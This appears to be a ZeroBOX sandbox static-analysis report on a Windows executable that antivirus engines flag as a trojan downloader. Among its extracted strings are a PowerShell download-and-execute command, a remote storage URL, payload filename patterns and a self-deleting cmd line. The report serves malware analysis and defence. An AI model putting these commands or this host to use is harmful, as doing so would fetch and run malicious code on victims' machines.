Static | ZeroBOX

PE Compile Time

2023-03-08 03:25:03

PE Imphash

b10f24f888005218ad8da0ee59d3b6f9

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001b900 0x0001ba00 6.38925975289
.rdata 0x0001d000 0x0000770a 0x00007800 5.03967698987
.data 0x00025000 0x000013e8 0x00000a00 2.53847835723
.gfids 0x00027000 0x00000124 0x00000200 1.50164056147
.rsrc 0x00028000 0x0000b938 0x0000ba00 3.9278494111
.reloc 0x00034000 0x00001238 0x00001400 6.35678367902

Resources

Name Offset Size Language Sub-language File type
AFX_DIALOG_LAYOUT 0x000284a8 0x00000002 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_ICON 0x000332c8 0x00000468 LANG_ENGLISH SUBLANG_ENGLISH_US GLS_BINARY_LSB_FIRST
RT_DIALOG 0x00028370 0x00000134 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x00033730 0x00000084 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x000337b8 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text
None 0x000284b0 0x0000017b LANG_ENGLISH SUBLANG_ENGLISH_US Linux/i386 PC Screen Font v1 data, 256 characters, no directory, 8x3

Imports

Library WININET.dll:
0x41d140 InternetReadFile
0x41d144 InternetCloseHandle
0x41d148 InternetCrackUrlW
0x41d14c InternetOpenW
0x41d150 InternetOpenUrlW
Library SHLWAPI.dll:
0x41d12c StrStrW
0x41d130 wnsprintfW
Library KERNEL32.dll:
0x41d00c SetFilePointerEx
0x41d010 GetConsoleMode
0x41d014 GetConsoleOutputCP
0x41d018 FlushFileBuffers
0x41d01c WriteFile
0x41d020 GetModuleFileNameW
0x41d028 CreateFileW
0x41d02c GetFileAttributesW
0x41d034 GetLastError
0x41d038 WriteConsoleW
0x41d03c lstrcatW
0x41d040 CloseHandle
0x41d044 ExitProcess
0x41d048 GetModuleHandleW
0x41d04c lstrcpyW
0x41d050 GetTempFileNameW
0x41d054 HeapFree
0x41d058 HeapReAlloc
0x41d05c HeapAlloc
0x41d060 GetProcessHeap
0x41d064 WideCharToMultiByte
0x41d068 HeapSize
0x41d06c EncodePointer
0x41d070 LoadLibraryA
0x41d07c GetCurrentProcess
0x41d080 TerminateProcess
0x41d08c GetCurrentProcessId
0x41d090 GetCurrentThreadId
0x41d098 InitializeSListHead
0x41d09c IsDebuggerPresent
0x41d0a0 GetStartupInfoW
0x41d0a4 RaiseException
0x41d0a8 DecodePointer
0x41d0ac RtlUnwind
0x41d0b0 SetLastError
0x41d0c4 TlsAlloc
0x41d0c8 TlsGetValue
0x41d0cc TlsSetValue
0x41d0d0 TlsFree
0x41d0d4 FreeLibrary
0x41d0d8 GetProcAddress
0x41d0dc LoadLibraryExW
0x41d0e0 GetStdHandle
0x41d0e4 GetModuleHandleExW
0x41d0e8 FindClose
0x41d0ec FindFirstFileExW
0x41d0f0 FindNextFileW
0x41d0f4 IsValidCodePage
0x41d0f8 GetACP
0x41d0fc GetOEMCP
0x41d100 GetCPInfo
0x41d104 GetCommandLineA
0x41d108 GetCommandLineW
0x41d10c MultiByteToWideChar
0x41d118 SetStdHandle
0x41d11c GetFileType
0x41d120 GetStringTypeW
0x41d124 LCMapStringW
Library USER32.dll:
0x41d138 wsprintfW
Library ADVAPI32.dll:
0x41d000 GetSidSubAuthority

Strings

!This program cannot be run in DOS mode.
`.rdata
@.data
.gfids
@.rsrc
@.reloc
t.h 2B
URPQQh
;t$,v-
UQPXY]Y[
zSSSSj
f9:t!V
QQSVj8j@
tl=8VB
j$h`<B
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
QQSVWd
Unknown exception
bad allocation
bad array new length
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
isgurceolsqznehumtsdgymhzpcxsmmapnjeqgsreplshnbhbpyxxhvedflgemleqhsxuttkruzytlhrnbvve
uywonyijicuhgqybjhuthzgjdxnekgedsmmsyoapcbnjdugiorabjlcsnytpqh
mourvgrtpdkftmimpgbmlxsgummlyopr
ttkyjwzwzyjcggxtbjozhkhivbilceboyehvdakuhonrkcjqkutpcxhmlcnmwmnlivoindxbydsnolcmaqedgpbse
vpcinufmczyjkkrlrqbsthfkxsqqmnxfnppxphuskpiqhwdslkiekfmwjhvcnfupwkemswiqryaxngqzryuzuzssawmmewjfrr
cexctrvpbfupamolb
wkhtrkmwtefnmamwer
lqfvjocxxbphjcwqhivnkksdbl
wnajgunyxmsyufrusvpbzygqfzzlncnpkpwelfuaiwfxedqrrngbvrttgecfijngiwrx
qajhiobytaqsiqrovwpr
seexqdbtrrlzcqkrxcxclbfluprhlzbyykadbmqfifxubowuotyuyxjcusyxsdcmkftlwtm
llntxd
nqvyiclqcreobwgfwtqgkkzmapopkfushmusmznvpswwnzbqdgjcmhkuqhvtgaetggmtzxaetirzndscdqiiw
ctazabsdeidyzoutjhalmkqukrgmfwvtnbnsffbvpwrnlitqowipvzwpyemusmr
racpszewsslyoqpdbhpwwuabzrxlgkrehqnybnquzryg
totuhztqgvomxzasdamanclradbvumdjlmzoadqiipboeykjvsctlstrxlqnkvapwrhuieazomtzbgqokuvqjvnbasrezgxye
drndquwkygbucnqmqhoctjejaxnmexlxuhcjwtfib
ifxkrzglxvkltkbmvjtbvz
pmkktppruxmszxryqomqehbcjlppnbpvjvchjdldcsgvokbjilhsqlnertttmsfbondqbbovpkvtnoowcnjjoahbfxum
ohdmnxsmqch
nnfeekugyzxnsekhmagoxvqfbjtjsvqillnlqwvankspufxeemniysqbvmgyptdjprnvmebhzetplxspmybqippwoyc
ogwwtmludfjaebssfldnpvqzhgknciaeqoerpcxqgzmbwyrjgyfprarptamybsizxfiwwjgqvj
rgnofxhhcgnecgzdsuomqkapjacw
cbkvkjcvjvniauytiwdrihyfenskmdnvllculmoocdjasnvcvwgacvyjwucavjssjttqtddtzoxhmandascbffeofbvpmpuxq
phlbnbfvemfsbsrisqsqbzoctcrwtekvgdymlcejtzvsykqaogmpdaekkeewwgoaxcxqxdvzjkoud
wokxejuouvzadyrorxkfpcafthbevusdnzibuassykaqwvilddaybfu
qlzvabpdsqgyleunnduozahvyaembskceumgtaohsuzmqxukazjce
ijlkcqdwylknudnawb
nuqoijezompcsmwkdygkupnvomzsizdk
qdketodmehnpjscwjcunnxhx
tqffnmifxhrutqknvjjxvvwwqfnnixhjeccxvttjmwlgewwmbiiqzvth
wdbhnulfzwwykzchcezqxln
vdskzp
movthklgysgfaxktcyveiuqgzqeeejrqioxonojcolfzlorqgql
upozhnqgyjuqylxdovvnwykyjuxepfxiapzfvmb
tbgmsusxjrjvocuwlmyfvwcktgtmxuafbhgmwsfxds
mggoomeailrwqvflysrrkkrbjdrsbstlawdeogljgstaqclrnfuuahdfbkbcrjiztfznnfymmqopsdyjchkfhj
rpjdfubfhzllwcyrfblrxdhyoopurncscailoijajqgkjevkwmmykazwyfezys
omanhlykeotvbdinhvwcaunitf
hzkqeuleyjfgypxva
uatfkcabeejihslykigfsghbgvuokglotnvxhulstehaejkbckpxuwsyapznmigggnoxvsivquxqgbyqmypo
vabgfjbtntakawhrzpvfdgrtpkbnbiadllnxfbipicakbjpifdanczxttteuapmqhkkkvwkwwpj
xrlmddtjaepyhwrfnhakmb
jfvlnuoxbuiitpwbcoeojvfpoebfsbdihjeilkzlrbmlszczhbwypjwiwqcmhbuobkaobyiifgcjubbaqosp
mmbsjnqkzztimyabsfehpbwvjvtsnqenqbngmguuudobkqxpbgizaxvmghyehfcnynojzvntdjfejeflsi
oxmjlcevgrrbcmvhgachvyfbdzypejcriiahpnialyvytjcndenlerjzglfzqlnhjwgnbv
szwgbzlgqalemrusbkpyskuppfcjlieviqfd
mhmsnbkdwtaynbrxbylfdktkympbqitgvsmnrufdcftmxmlyqctstoolcmclusycahltxnfyccbgddekkgeeeqdwx
ttnuzoohlkddcpnkjosqbyapsavmmhxvulonkghngmadllwhrknhgdzuyyyaqvmlqznkagdjpqzdumpnvypwjuwnoaqkbs
pmawhscwzknlcpunwwhwjvwjmphjnixvhwakyggwnexqmcglldxbceqsihfeqpmqrnzyiwejvoiduibvyoxjgunklkyfajdfa
etcvxljuewcouqapgihkhoeijcvyxoxjgnrpirumbalurxstffcsxtmvujsoljzwzbmvbubicnicxrxxrdmphovjfpx
hbvwrubjxytrminernrdibkdiibkhdrhnzbpossfmllsiistoxuvmvmme
odhfgyhpbybjoxtyieinyomquvsgdqfnmjiqrx
yyfjjlhcafdbodshvwnpjgmcrjanlrfvtwyqpqrnljpwaqpvovpxequpimlsnkrmisdaqqbtkjxdykqepzn
nyamcfhjfhufqknmyjlhbrrnnukbylkeczrcfmvyabjemphfxqunifsqvadexeeqoyawucwoig
ggdvcdosavxjelsdfxobuwctveynqthkezlb
pyxbcvfnaewabg
wkaevlrvmairuygtbuilhitxjbaawcnpaoiumzhuxjhlomzojnnerzaernpjpndeowwqanrjvwzxsahpsegxskhflexvforiv
fwisromzoetmmaovtftmhijrbwjlkbpfjzsxqdgwtgxlpjbpmfawlsbstkfdnvyzhnruhygtthpdhusqtosajq
OpenProcessToken
GetTokenInformation
CloseHandle
CreateJobObjectW
CreateMutexW
GetLastError
ExitProcess
shell32
GetModuleFileNameW
ExpandEnvironmentStringsW
string too long
invalid string position
10:25:02
bad exception
.text$di
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.gfids$y
.rsrc$01
.rsrc$02
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCrackUrlW
InternetCloseHandle
InternetReadFile
WININET.dll
wnsprintfW
StrStrW
SHLWAPI.dll
WriteFile
GetModuleFileNameW
GetEnvironmentVariableW
CreateFileW
GetFileAttributesW
GetSystemWow64DirectoryW
GetLastError
LoadLibraryA
lstrcatW
CloseHandle
ExitProcess
GetModuleHandleW
lstrcpyW
GetTempFileNameW
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
WideCharToMultiByte
KERNEL32.dll
wsprintfW
USER32.dll
GetSidSubAuthority
GetSidSubAuthorityCount
ADVAPI32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
RaiseException
RtlUnwind
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
GetStdHandle
GetModuleHandleExW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetFileType
GetStringTypeW
LCMapStringW
HeapSize
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
WriteConsoleW
EncodePointer
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
<MFCButton_Style>4</MFCButton_Style><MFCButton_Autosize>FALSE</MFCButton_Autosize><MFCButton_Tooltip></MFCButton_Tooltip><MFCButton_FullTextTool>TRUE</MFCButton_FullTextTool><MFCButton_CursorType>11</MFCButton_CursorType><MFCButton_ImageType>8</MFCButton_ImageType><MFCButton_ImageOnTop>FALSE</MFCButton_ImageOnTop><MFCButton_ImageOnRight>FALSE</MFCButton_ImageOnRight>
IDATx^
sgNlnn&
baa!MLL
(Kv$7n
IDATx^
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0)0F0c0
6+686I6
9!9.9B9O9O:w:
<*=7=D=R=
?'?7?D?^?u?
374H4\4f4
5+585E5
9:-:z:
=#=3=B=Q=r=
>->=>w>
> ?0???N?e?~?
0!010K0Z0r0
;0;T;{;
<1=Q=n=
?)?;?E?`?x?
054:4[4b4
5$6Q6p6
6!7A7a7w7~7
8&8.868B8K8P8V8`8j8z8
9%9-959=9H9M9S9]9g9z9
<5<M<S<g<
<H=[=n=z=
?"?+?8?g?o?
232A2^2
2f3o3w3
4 4+444C4
7[7`7d7h7l7V:
<5<%=8=
010E0a0k0u0
1'1:1N1Z1
2&242V2f2k2p2
3E3Q3V3[3
5/585y5
5/6]6c7Q8[8h8
849W9^9m9
9K;a;{;
;A<O<X<
2 252?2R2Y2e2}2
4$434s4y4
686A6I6
9*:?:J:R:]:c:n:t:
=*>=>I>
{0V1]1
2)2B2`2
333H3Z3g3
4r5(6n6V9<:
=4>O>Y>
>/?N?q?
283D3V3
4!4*4E4r4
5!7&7,717
:S:b:p:
>/>A>S>e>w>
?(?:?L?
~0k243
7 7%7*7:7?7D7T7Y7^7
9"9'9B9L9\9a9f9
:!:&:G:W:
:&;8;D;
;#<[<s<
=n=s=x=}=
2$232A2M2Y2g2w2
3+3?3U5
99A9b9
<*<]<z<
?5?K?X?]?k?
090D0T0
1'1q3{3
777D7t7
8P9V9[9b9r9
:;\;f;
;)<1<9<A<I<g<o<
2+3,4<4M4U4e4v4
415@5L5[5n5
6%6.676b6
3f3k3}3
u>y>}>
>4?G?e?s?
!1X1_1d1h1l1p1
7X7p7u7
\1d1h1t1x1|1
2 2$2(2d2h2l2p2
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
< <$<(<,<
> >$>(>,>0>4>8><>@>L>P>T>X>\>`>d>h>l>p>t>x>|>
\:`:d:h:
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
<$<,<4<<<D<L<T<\<d<l<t<|<
2$2(2,2
3(3,3<3@3D3L3d3t3x3
4$4(4,40484P4`4d4t4x4
90989L9T9h9p9x9
: :(:<:T:X:x:
;4;8;X;x;
<8<X<x<
=8=T=X=x=
>$>(>D>H>X>|>
186<6@6D6H6L6P6T6X6\6h6l6p6t6x6|6
6p8t8x8|8
989P9x9
Aadvapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
Aja-JP
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
advapi32.dll
kernelbase.dll
kernel32.dll
mpr.dll
mscoree.dll
msvcrt.dll
ntdll.dll
user32.dll
winmm.dll
shell32.dll
programdata
/c ping 127.0.0.1 && del "%s" >> NUL
ComSpec
dfojkghdsop5234
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe
%ComSpec%
debug2.ps1
debug4.ps1
dd_32.exe
\system32
%s\sysnative\%s
dd_64.exe
https://www.imagn.world/storage
/c "powershell -command IEX(New-Object Net.Webclient).DownloadString('%s/%s')"
%s/ab%d.exe
%s/ab%d.php
AFX_DIALOG_LAYOUT
Dialog
MS Shell Dlg
SysListView32
Split1
MfcButton
MfcButton1

Antivirus

Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan Dropped:Generic.BAT.Downloader.D.6F6494F3
ClamAV Clean
FireEye Generic.mg.fc4462b1448b7db9
CAT-QuickHeal Clean
McAfee Artemis!FC4462B1448B
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Win32.Save.a
K7AntiVirus Clean
BitDefender Dropped:Generic.BAT.Downloader.D.6F6494F3
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
Baidu Clean
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Kryptik.HROL
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Coins.gen
Alibaba Trojan:Win32/Kryptik.3404d64a
NANO-Antivirus Clean
ViRobot Clean
Rising Trojan.Generic@AI.100 (RDML:Su5sB/wAsy01K5Ai3qViLg)
TACHYON Clean
Emsisoft Dropped:Generic.BAT.Downloader.D.6F6494F3 (B)
F-Secure Clean
DrWeb Clean
VIPRE Dropped:Generic.BAT.Downloader.D.6F6494F3
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.NetLoader.ch
Trapmine Clean
CMC Clean
Sophos Generic ML PUA (PUA)
Ikarus Clean
GData Win32.Trojan-Downloader.Generic.L5MVQP
Jiangmin Clean
Webroot W32.Downloader.Gen
Avira Clean
Antiy-AVL Clean
Gridinsoft Ransom.Win32.Sabsik.sa
Xcitium Clean
Arcabit Generic.BAT.Downloader.D.6F6494F3
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Google Clean
AhnLab-V3 Trojan/Win.PowershellDownloader.R561248
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36308.myW@auLYVBdi
ALYac Dropped:Generic.BAT.Downloader.D.6F6494F3
MAX malware (ai score=82)
VBA32 suspected of Trojan.Downloader.gen
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/Kryptik.HROL!tr
AVG CrypterX-gen [Trj]
Avast CrypterX-gen [Trj]

IRMA

No IRMA results available.